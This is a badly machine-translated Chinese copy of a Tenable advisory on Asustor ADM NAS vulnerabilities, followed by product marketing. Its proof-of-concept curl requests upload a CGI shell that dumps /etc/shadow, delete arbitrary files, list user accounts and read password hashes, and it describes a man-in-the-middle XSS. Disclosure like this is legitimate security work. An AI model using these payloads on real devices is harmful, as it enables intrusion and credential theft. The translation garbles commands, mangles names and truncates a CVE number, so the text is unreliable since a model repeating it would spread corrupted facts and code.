脸书 Google+ 微博 LinkedIn YouTube系统 RSS系统 菜单类 搜索 资源-博客 资源-Webinar 资源-报表 资源-事件 图标#066 图标_067 图标_068 图标_069 图标070

[R1]多运算数据主易变性

高位

简表

在研究Asstor As-202TNAS时,可租性发现多重漏洞

CVE-2018-15694认证文件上传

认证远程非行政攻击者可以在目标文件系统任何地方上传文件目标总是命名上传文件WallPaper_1.j.ifweb服务器特征启动后远程非认证攻击者可写字实现远程代码执行/cgi-bin/

excell-k-xPOST-HCente-Type:多段/格式数据boundary=-pwned-' --data-binary $'-pwned-\x0d\x0aContent-Disposition: form-data!filename=\"1.jpg\"\x0d\x0a\x0d\x0a#!/bin/sh\x0aecho -e \"Content-Type: text/plain\\n\\n\";id;uname -a;cat /etc/shadow\x0d\x0a-pwned-\x0d\x0a'     $'https://192.168.1.10:8001/portal/apis/wallpaper/uploadwallpaper.cgi?sid=9dpDW4U9jUm.2HNb&act=upload&appdirpath=../../../share/Web/cgi-bin/' { "success": true } $ curl -k http://192.168.1.10:80/cgi-bin/WallPaper_1.jpg   uid=999(admin) gid=999(administrators) groups=100(users),997(nvradmins),999(administrators) Linux Clarke 3.10.70 #1 SMP Wed Jun 13 01:06:06 CST 2018 armv7l GNU/Linux root:$1$WRyOw/55$eN4aG9y2Mc6GFsQ1SMLSm.:17599:0:99999:7::: avahi:*:15259:0:99999:7::: ...

CVE-2018-15695认证任意文件删除

认证远程非行政用户可删除文件系统上的任何文件,原因是路径遍历易懂墙纸.cgi.

$ curl -k "https://192.168.1.10:8001/portal/apis/wallpaper/wallpaper.cgi?sid=2LEyW3.EhAYUCWVF&act=removewallpaper&appdirpath=../../../tmp&file=test.file"   { "success": true }

CVE-2018-15696认证账户编号

认证远程非行政用户可以通过设备登录所有账号user.cgi.

$ curl -s -k "https://192.168.1.10:8001/portal/apis/accessControl/user.cgi?sid=C8wyW20b6wYUz31g&act=list&start=0&limit=0&domain=0" | python -m json.tool {     "datas": [         {             "description": "guest",             "email": "",             "group": "-",             "name": "guest",             "primary_gid": 65534,             "status": "Inactive",             "uid": 998         },         {             "description": "Admin",             "email": "",             "group": "administrators",             "name": "admin",             "primary_gid": 999,             "status": "Active",             "uid": 999         },         {             "description": "",             "email": "",             "group": "users",             "name": "courtney",             "primary_gid": 100,             "status": "Active",             "uid": 1000         },         {             "description": "",             "email": "",             "group": "users",             "name": "lab",             "primary_gid": 100,             "status": "Active",             "uid": 1001         }     ],     "success": true,     "total": 4 }

CVE-2018-15697认证文件披露

认证远程非行政用户可访问NAS共享文件,在请求中指定全文件路径downloadwallpaper.cgi.下例中,bash历史文件取自/Home/admin/.

exstat-anNetstat-aNetstat51417tcpp

CVE-2018-15698认证文件披露

远程认证行政用户通过向远程目标发送请求读取文件内容日志.cgi.

$ curl -k "https://192.168.1.10:8001/portal/apis/settings/loginimage.cgi?sid=4K4yW-gqeQazweZ0&act=preview&file=/etc/shadow" root:$1$WRyOw/55$eN4aG9y2Mc6GFsQ1SMLSm.:17599:0:99999:7:::

CVE-2018-1569:MITMXSS

远程行政用户先认证NAS执行awget大全http://update.asustor.com/adm_update.php?architecture=armv7l&model=AS1004T&version=3.1.0.RFQ3&initialized=true并剖析结果.conf文件.下举示例文件 :

模型Name = AS10XXT版本 = 3.1.4.RID1发布日期= 2018/06/14发布注

中间人可以修改版本字段以注入窃取管理员证书的Jaavascript例举 :

版本=pnme

求解

升级为Asstor数据主数3.1.6或以后

披露时间线

07-12-2018-供应商通知 [email protected].
07-25-2018-Server二次通知
07-25-2018-供应商自动响应表示没有权限发送 [email protected].
07-25-2018-可租知情Asstore通过Webform显示他们的隐私邮件似乎破解请求安全联系人
07-25-2018-Asstor响应使用 [email protected].
07-26-2018-可租量表示 [email protected]破解已经寄送两次
07-27-2018-Asstor日期 [email protected]意外禁用要求Tenable重发
07-27-2018-可租寄第三通知和最后通知 [email protected].
07-30-2018-Asstor确认vurns并说他们将尽快修复
08-22-2018-Asstor推理3.1.6修正的可验通知15分
08-22-2018-可租接触Asstor确认修复为3.1.6
08-23-2018-Asustor忘记通知Tenable求可确认修复
8242018-可租确认修复

TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响

可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作 快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案

关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码

如有问题或更正,请发邮件[email protected]

风险信息

可租咨询ID
TRA-2018-22
信用

安德鲁欧尔

sv2基础/时间评分
8.5/6.7
sv2向量
AV:N/AC:M/Au:S/C:C/I:C/A:C
受影响产品
Asstor数据主数3.1.5和
风险因子
高位

咨询时间线

06-24-2018-[R1]初始发布

可耐受脆弱性管理

前称Tenable.io


完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

试可穿Nessus专业免费

免费7天

TenableNessus是当今市场最全面的脆弱感扫描器

New-Nessus专家
现可用

奈苏斯专家增加更多特征,包括外部攻击表面扫描能力以及添加域和扫描云基础设施能力点击这里尝试Nessus专家

填表后继续使用NessusPro测试

可买Nessus专业

TenableNessus是当今市场最全面的脆弱感扫描器可租Nessus专业程序帮助脆弱性扫描自动化,在守法周期中省时并允许你加入IT团队

购买多年度许可证并保存添加高级支持访问电话、社区聊天支持全天365天全天24小时

选择您的许可

购买多年度许可证并保存

添加支持培训

tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

tenable.io 付费

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

可租WebApp扫描试

前称Tenable.ioWeb应用扫描

完全存取最新网络应用扫描服务 设计现代应用安全扫描全在线组合漏洞高精度而不人工重创或干扰关键网络应用现在就签名

可租WebApp扫描实验中也包括可租易用性管理、可租可租鲁明和可租云安全

可租WebApp扫描

前称Tenable.ioWeb应用扫描

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

5 FQDNs

3 578美元

立即购买

试可腾鲁明

可视化并探索接触管理,跟踪随时间推移降低风险,并参照Tenablelumin对等基准

可点Lumin测试中也包括可点易点管理、可点WebApp扫描和可点云安全

可买路明

联系销售代表,看可租Lumin如何帮助你在整个组织中获取洞察力并管理网络风险

试可耐云安全

前称可租.cs

完全无障碍检测并修复云基础设施误配置并观察运行时漏洞注册免费测试了解更多试验过程点击这里

可租云安全测试中也包括可租易用性管理、可租可租鲁明和可租WebApp扫描

联系人a购买可租云安全

联系销售代表了解更多可耐云安全知识,并观察多易登录云账号并在分钟内为云误配置和漏洞获取可见度

试可耐奈苏斯专家免费

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

已经有TenableNessus专业
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

试Nessus免费专家

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

内索斯职业类
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

Baidu
map